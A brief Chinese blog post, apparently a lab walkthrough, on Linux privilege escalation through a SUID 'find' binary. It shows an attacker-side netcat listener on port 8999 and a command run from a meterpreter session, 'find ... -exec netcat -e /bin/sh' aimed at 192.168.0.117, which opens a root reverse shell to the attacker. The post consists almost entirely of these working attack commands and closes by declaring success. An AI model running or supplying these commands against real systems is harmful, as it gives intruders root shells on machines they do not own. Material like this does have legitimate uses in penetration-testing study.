攻击机

root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...

在meterpreter的shell中执行find suidtest -exec netcat -e /bin/sh  192.168.0.117 8999 \;

成功提权

posted @ 2019-05-06 23:01  奥利给胖虎  阅读(752)  评论(0编辑  收藏